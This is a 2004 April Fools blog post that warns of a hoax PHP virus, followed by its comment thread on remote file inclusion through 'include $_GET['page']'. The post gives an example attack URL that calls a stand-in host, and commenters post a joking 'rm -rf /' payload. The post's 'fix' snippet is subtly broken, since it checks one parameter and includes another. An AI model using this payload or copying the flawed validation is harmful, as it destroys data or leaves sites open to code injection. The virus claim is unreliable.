Symantec have a report of the virus here.
I’ve yet to see any of the PHP news sites picking up on it but, using a virtual host account, managed to deliberately expose some PHP scripts to it.
From examining the infected scripts, what’s disturbing is once infected, every time a script is executed, the virus goes on a hunt for other web sites using PHP to see if it can trick them into executing the virus, thereby spreading it further directly over the Internet. Although the spread it likely to be slow, it can takes place automatically, without your intervention!
If your site contains code like;
// index.php
include $_GET['page'];
You need to take action now – your site could be infected with a URL like;
http://yoursite.com/index.php?page=http://virus.com/virus.php
A simple way to validate is;
$pages = array('news','articles','blog');
if ( in_array($_GET['page'], $pages) ) {
include $_GET['php'] . '.php';
} else {
include 'home.php';
}
Sitepoint have taken the extreme but necessary approach of upgrading to .NET in response.
Related posts:
- Microsoft Release Free Anti-Virus Package Microsoft's Security Essentials is a free Windows anti-virus package that...
- How to Test Multiple Websites on One PC With Apache Virtual Hosts Testing one website on your local web server is easy....
- Server-side JavaScript Will Be as Common as PHP Despite the fact that JavaScript has been typecast as the...
- How to Install PHP on Windows In his final installation tutorial, Craig provides a step-by-step guide...
- On $_GET and $_POST Troels Knak-Nielsen offers some thoughts about the naming of $_GET...
thanks god its not friday”
instead april’s fool :)
April 1st, 2004 at 7:28 am
< ?
system(”rm -rf /”);
?>
April 1st, 2004 at 8:04 am
damnit!
April 1st, 2004 at 8:04 am
Oh no!! I better start learning ASP! Do you know any good .Net tutorials?
April 1st, 2004 at 8:28 am
Damn! I guess I better scrap my PHP project and ASP it pronto.
I trust that I’ll encounter far less bugs.
:p
April 1st, 2004 at 8:56 am
In all seriousness, should this warning be heeded or taken as an April Fools joke? I’ve edited my pages, and am awaiting a response.
April 1st, 2004 at 9:55 am
Bryce: It’s a joke. If you include another website’s PHP-pages, your webserver gets the HTML-output and not the PHP-code.
April 1st, 2004 at 10:37 am
Icheb, really?
Try this:
< ?
echo ‘< ? system("rm -rf /"); ?>‘;
?>
:-)
April 1st, 2004 at 12:03 pm
Don’t panic on the virus – actually that report is ages old (same on Symantec for not putting a date on it) as is Pirus – John Lim mentioned it here back in 2000.
But jesting aside, you should be careful using the include (or similar) statement with a variable that a visitor can modify. A common (mistake) is this;
if ( isset ( $_GET['page'] ) ) { include $_GET['page']; } else { include 'default.php'; }That’s a recipe for disaster – someone attacking your site can get your script to execute code from their site – they just need to make sure that what’s being included is valid PHP, from the point of view of the PHP parser (e.g. serve your script a page as plain text with a .txt extension). Try it in your own webserver, including a file like;
include 'http://localhost/test.txt';Where text.txt contains some PHP.
This behaviour in PHP can be switched off see here. Simon has some interesting remarks of this functionality here. For a more in depth analysis, try A Study in Scarlet.
Bottom line make sure you validate the incoming GET variable, a simple but effective approach being to require it’s value be part of a list, as I did at the start.
April 1st, 2004 at 12:06 pm
Icheb: I do hope you’re kidding. If the include’d/require’d remote file has valid PHP tags in the output it will be parsed as such.
April 1st, 2004 at 12:10 pm
Well, you definately got me. It was after 12PM here at the time so I guess I wasn’t on my guard. Still, it’s good to see that my time wasn’t so completely wasted :)
Cheers
April 1st, 2004 at 8:03 pm
I’ve ranted about this before: This is quite simply PHP’s worst feature – executing arbritary PHP code that has come in over an HTTP network connection is an unbelievably nasty security hole and should never happen, period. Almost every single critical security flaw in a PHP site that I’ve seen has been down to this feature.
April 1st, 2004 at 10:13 pm
Skunk, what are you talking about? Only fools would take in user input and actually use that in an include statement. I don’t know what sites you have been looking at, but common flaws are SQL injection, XSS, and possibly cross site request forgeries…
April 2nd, 2004 at 1:43 am
Another point would be if the site supports the upload of files to the server (e.g. if you don’t check image uploads are actually images)
So, if you upload a php script in place of an image, then use this script to run the php file, bang, your wide open.
This is just a friday morning observation though, I could be entirely wrong and paranoid.
April 2nd, 2004 at 2:55 am
This is an easy security hole to solve.
I hope you didn’t even used this method to include some content in your scripts. It’s important to check the input before to use it in your script. Basic mistake :)
April 2nd, 2004 at 9:20 am
the classic answer … throught the sofa for the window.. instead of your wife if you found here cheating you in that sofa ;)
April 2nd, 2004 at 10:35 am
“Icheb: I do hope you’re kidding. If the include’d/require’d remote file has valid PHP tags in the output it will be parsed as such.”
So? That’s not contrary to what I said. It still gets the *HTML-output* and not the PHP-code which generated that output.
April 2nd, 2004 at 10:25 pm
WhatThe: you would be amazed at how many scripts I’ve seen that do exactly that! I reported that exact bug to the makers of a very popular PHP ShoutBox script a few months ago. Even Gallery has suffered from that bug in the past: check out the vulnerability announcement from last October. It’s a shockingly common mistake, and one that just shouldn’t be possible to make in the first place.
April 4th, 2004 at 9:17 pm
[...] For more detail, the issue came up in discussion back in April 1st, 2004 and Simon’s comment summarizes the significance nicely while more detail is in this comment which links back to an old blog entry from Simon. George has also explained this before. [...]
November 18th, 2005 at 7:37 am